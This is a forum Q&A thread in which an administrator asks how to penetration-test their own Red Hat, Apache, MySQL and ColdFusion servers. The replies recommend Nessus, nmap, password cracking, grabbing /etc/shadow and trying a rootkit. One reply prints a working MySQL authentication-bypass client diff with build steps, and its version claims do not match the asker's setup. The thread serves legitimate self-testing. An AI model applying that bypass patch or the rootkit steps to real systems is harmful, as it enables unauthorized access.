Solved

How to hack my server

Posted on 2004-08-27
5
1,814 Views
Last Modified: 2008-01-09
To all,

I would like to try to hack our dev servers (they are a replication of our producution servers).  We have implemented several new layers of security including a Cisco Pix 501 firewall and IPTables.  But I am hoping somebody can shed some light on how I would go about trying to hack my own server to ensure they are secure.  We already do port scaning to ensure there aren't any extra open ports that aren't being used.  Are there applications that I can use for password hacking? etc.  Thanks for the help in advance.

Specs: (Three tier architecture)
RH 9.0
Apache 2.0.40
MySQL 4.0.2
Jrun4 w/ CFMX
0
Comment
Question by:chigs20
5 Comments
 
LVL 5

Accepted Solution

by:
Chireru earned 250 total points
ID: 11918435
For every port that is open, check the version of the daemon that is holding the port open, and see if there are any unpatched exploits available for that daemon.  Bugtraq is a good place to start looking for the advisories.

Next, I would suggest logging into an anonymous or guest account, and see how many files you can delete, and what you can touch that you shouldn't be able to.  Also try this as a regular user.  See if you can get a copy of the /etc/shadow.  Check what processes are running, and see if there are any exploits for them.  Do a google search for "rootkit", see about downloading one and install it.. see if you can take over the box from a regular user.

As long as it's updated, the PIX can take most of the network-based attacks, all you have to look out for now is exploits, and guests and regular users doing things they shouldn't be doing (like installing rootkits).
0
 
LVL 17

Expert Comment

by:owensleftfoot
ID: 11918653
Give nessus a go. http://www.nessus.org/
0
 
LVL 16

Expert Comment

by:xDamox
ID: 11926202
The version of MySQL is vulnerble to a NULL password:

Vulnerable Systems:
 * MySQL version 4.1 up to but not including 4.1.3
 * MySQL version 5.0

Immune Systems:
 * MySQL version 4.1.3

The diff patch can only be used against the latest alpha version (5.0.0) of MySQL. In order to use it, follow the following steps:

 * Download and unpack the MySQL 5.0.0-alpha source
 * Patch the sql-common/client.c file:
    sql-common/ $ patch client.c mysql.authentication.bypass_client.c.diff
 * Configure and Make as usual

The resultant MySQL client binary can then be used normally but with one exception: The user can completely disregard the password and in fact can enter any password and it would not matter. The provided diff patch:
1941,1956c1941,1942
<   if (passwd[0])
<   {
<     if (mysql->server_capabilities & CLIENT_SECURE_CONNECTION)
<     {
<       *end++= SCRAMBLE_LENGTH;
<       scramble(end, mysql->scramble, passwd);
<       end+= SCRAMBLE_LENGTH;
<     }
<     else
<     {
<       scramble_323(end, mysql->scramble, passwd);
<       end+= SCRAMBLE_LENGTH_323 + 1;
<     }
<   }
<   else
<     *end++= '\0';                               /* empty password */
---
>   sprintf(end,"\x14\x00");
>   end+=2;


also to check your security use a password crack on your own system see if it can crack them
0
 
LVL 9

Expert Comment

by:_GeG_
ID: 11947497
just tell us your ip ;)
0
 
LVL 51

Assisted Solution

by:ahoffmann
ahoffmann earned 250 total points
ID: 11982587
which kind of penetration test are you interested?
 a) host and/or network
 b) any application
 c) web application

for a) see nmap (or nessus), for b) nmap again and some specialized tools too, and for c) you need $$$$$
0

Featured Post

Master Your Team's Linux and Cloud Stack

Come see why top tech companies like Mailchimp and Media Temple use Linux Academy to build their employee training programs.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
RHEL 7 , how do you see open firewall ports  ? 3 170
IRQD Load 34 153
Redhat Linux 6.6 and LDAP 18 118
The endless cat and mouse game of fail2ban 4 120
​Being a Managed Services Provider (MSP) has presented you  with challenges in the past— and by meeting those challenges you’ve reaped the rewards of success.  In 2014, challenges and rewards remain; but as the Internet and business environment evol…
BIND is the most widely used Name Server. A Name Server is the one that translates a site name to it's IP address. There is a new bug in BIND (https://kb.isc.org/article/AA-01272), affecting all versions of BIND 9 from BIND 9.1.0 (inclusive) thro…
Along with being a a promotional video for my three-day Annielytics Dashboard Seminor, this Micro Tutorial is an intro to Google Analytics API data.
This video shows how to use Hyena, from SystemTools Software, to bulk import 100 user accounts from an external text file. View in 1080p for best video quality.

809 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question